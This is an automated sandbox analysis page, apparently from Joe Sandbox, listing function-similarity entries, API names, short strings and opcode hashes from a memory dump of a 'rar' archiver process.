                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 932687459-0
                                                                                                                                                                                                                                                                    • Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                                                                                                                    • Instruction ID: b93ea8073a7e63ad0d6df79ab0c776375c8356ffc6fd6e35d24c625cc21f98f0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8819162A0D68285EB31DA11E4403B963D0EF44F94F585272DA4DC7A99DF7CEC4B8788
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: swprintf
                                                                                                                                                                                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                                                                                                                                                                                    • API String ID: 233258989-2277559157
                                                                                                                                                                                                                                                                    • Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                                                                    • Instruction ID: ce1fd5d52a5d48f4e83ea4a6929fe19a1e628c8bb006857fb896b50ea941efa0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6102B222B4C68281EA34EA31A5453FE63E1EF41B80F44117BDA8EC7792DF7DE9498345
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                                                                                                                                                                                                                                    • String ID: rtmp%d
                                                                                                                                                                                                                                                                    • API String ID: 2308737092-3303766350
                                                                                                                                                                                                                                                                    • Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                                                                    • Instruction ID: 4374395a270561333ade450c1683b3d2f908161c2f4b9b4d1103d5b0778e73de
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0516F22A1868685EA70AF21D8405FE23A0FF44F84F551176DD0DDBADADF3CDA09D744
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseCreateEventHandle$ErrorLast
                                                                                                                                                                                                                                                                    • String ID: rar -ioff
                                                                                                                                                                                                                                                                    • API String ID: 4151682896-4089728129
                                                                                                                                                                                                                                                                    • Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                                                                                                                    • Instruction ID: bb58405a8a58351d80babe631e67942b57b8d9fc107a27a3f57e1fef47894fe7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F016D24A19A06C7FB38DFB0A85413523E1EF54F01F4466B1D84ECB2E0DE3C6C4C8689
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                    • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                                                                                                                                    • API String ID: 667068680-1824683568
                                                                                                                                                                                                                                                                    • Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                                                                                                                    • Instruction ID: abe532a7a7c67b6d020677055ac9f388026016a2150315f68458c53a96f85905
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1F01925A09B4681EA24DF51F85407527E0EF49FC0B4CA6B0DD5E8B7A4EE2CE84DC308
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: +$-
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-2137968064
                                                                                                                                                                                                                                                                    • Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                                                                                                                                                                                                                                    • Instruction ID: 2e898fb06a09fa6e2ae1fc45cf157bb588792659560ebbac7256392d69e3666f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7512B426E0954345FB349A94D4442B862D5EB41FACFC853B2C69AC36C8DF3DEE8D8308
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Backup$Read$Seek$wcschr
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2092471728-0
                                                                                                                                                                                                                                                                    • Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                                                                                                                    • Instruction ID: c3fd8b4d7fe6715bc63505deff8cce8ce5fd57158433835b53aaee3cddcfd3f0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B514D32608A45C6EB30DF25E44116AB7E4FB89B94F500279EA9D87B98DF3CDD49CB00
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2092733347-0
                                                                                                                                                                                                                                                                    • Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                                                                                                                    • Instruction ID: 0f67b1caf78282930e87bfeff7a7b4bbce50e17f7ff007a35a91148e9288a28d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D5149B2B146518FEB68CFB4D4405AC37B1F708B88B50512ADE0E97B98DE38E959CB44
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2092733347-0
                                                                                                                                                                                                                                                                    • Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                                                                                                                    • Instruction ID: 7b097dc181e537721466b6b8184b1e806278f70274201d5be951e9594ed27c00
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7314D63B146518EFB14CFB4D8901BC37B0FB08B48B54512ADE0E97AA8EF38D899C344
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: exe$rar$rebuilt.$sfx
                                                                                                                                                                                                                                                                    • API String ID: 0-13699710
                                                                                                                                                                                                                                                                    • Opcode ID: ebf3ee1c537ad006fb1fd952ea697eae8a354c11a52e42eab83d53570c1c5079
                                                                                                                                                                                                                                                                    • Instruction ID: 330502317d977db0bf703fdbcaff1e152bd5a8054cbd042a1b8aa26512029547
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ebf3ee1c537ad006fb1fd952ea697eae8a354c11a52e42eab83d53570c1c5079
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2581A522A0C68285EA30EB35D4112FD27D2FF85B94F4052B6D94DCB6CADE6DED09C344
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentImageNonwritableUnwindabort
                                                                                                                                                                                                                                                                    • String ID: csm$f
                                                                                                                                                                                                                                                                    • API String ID: 3913153233-629598281
                                                                                                                                                                                                                                                                    • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                                                                    • Instruction ID: 207ffb10419b39d6e4d76dd71a11a74e7098fbd780111b491386a443d05fe412
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6619232A0964286EB38DF11E444A7927D1FF44F94F14A674DE0E87788DF38EC4A8B08
